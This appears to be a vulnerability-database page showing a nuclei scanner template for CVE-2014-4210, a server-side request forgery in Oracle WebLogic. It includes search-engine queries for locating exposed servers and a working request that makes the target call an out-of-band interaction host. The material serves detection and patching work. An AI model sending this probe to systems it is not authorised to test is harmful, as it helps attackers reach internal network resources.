Lucene search
K

Oracle Weblogic - Server-Side Request Forgery

🗓️ 19 Jun 2026 11:10:26Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 63 Views

Oracle Weblogic SSRF Vulnerability allows network restriction bypass to access internal resources

Related
Refs
Code
id: CVE-2014-4210

info:
  name: Oracle Weblogic - Server-Side Request Forgery
  author: princechaddha
  severity: medium
  description: An unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.0.2.0 and 10.3.6.0 allows remote attackers to affect confidentiality via vectors related to WLS - Web Services.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to bypass network restrictions and access internal resources.
  remediation: |
    Apply the latest patches and updates provided by Oracle to fix the SSRF vulnerability
  reference:
    - https://www.oracle.com/security-alerts/cpujul2014.html
    - https://nvd.nist.gov/vuln/detail/CVE-2014-4210
    - https://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html
    - http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html
    - http://seclists.org/fulldisclosure/2014/Dec/23
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2014-4210
    cwe-id: NVD-CWE-noinfo
    epss-score: 0.38152
    epss-percentile: 0.98372
    cpe: cpe:2.3:a:oracle:fusion_middleware:10.0.2:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: oracle
    product: fusion_middleware
    shodan-query:
      - title:"Weblogic"
      - http.title:"weblogic"
      - http.html:"weblogic application server"
    fofa-query:
      - title="weblogic"
      - body="weblogic application server"
    google-query: intitle:"weblogic"
  tags: cve2014,cve,seclists,weblogic,oracle,ssrf,oast,xss,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://{{interactsh-url}}"

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"

      - type: word
        part: body
        words:
          - "Search public registries"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022078d9221ec07097f53956f38bab9ab00eb5f58fe9eba518ab1f87a0389865e529022100bf319b63a30ff7a76fba1f775047df6b334170e33e710a878d9d548f54a8a570:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 25
EPSS0.38152
63